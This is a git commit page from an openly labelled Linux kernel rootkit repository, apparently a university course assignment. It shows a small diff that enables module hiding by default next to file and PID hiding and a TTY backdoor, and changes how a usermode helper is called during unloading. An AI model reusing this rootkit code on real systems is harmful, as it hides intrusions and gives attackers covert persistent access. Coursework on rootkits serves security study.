linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 859073e790825a12fc5eab8d48c9a6bc64e4964a
parent 74c031701e4a40b481853236b4324d5b4d691447
Author: deurzen <m.deurzen@tum.de>
Date:   Sat,  5 Dec 2020 18:38:20 +0100

refactors code

Diffstat:

Msrc/channel.c | 4+++-


Msrc/g7.c | 7++++---


2 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -85,7 +85,9 @@ handle_modhide(unsigned long arg)
 
         DEBUG_NOTICE("unloading module\n");
 
-        call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
+        call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
+
+        DEBUG_NOTICE("after unload\n");
     } else if (sarg < 0) {
         unhide_module();
         rootkit.hiding_module = 0;
diff --git a/src/g7.c b/src/g7.c
@@ -40,8 +40,9 @@ static struct file_operations g7_fops =
 
 
 rootkit_t rootkit = {
-    .hiding_files = true,
-    .hiding_pids  = true,
+    .hiding_module = true,
+    .hiding_files  = true,
+    .hiding_pids   = true,
     .backdoor = BD_TTY,
 };
 
@@ -116,7 +117,7 @@ g7_exit(void)
 
 MODULE_LICENSE("GPL");
 MODULE_AUTHOR("Group 7");
-MODULE_DESCRIPTION("Assignment 3");
+MODULE_DESCRIPTION("Rootkit Programming");
 MODULE_INFO(intree, "Y");
 
 module_init(g7_init);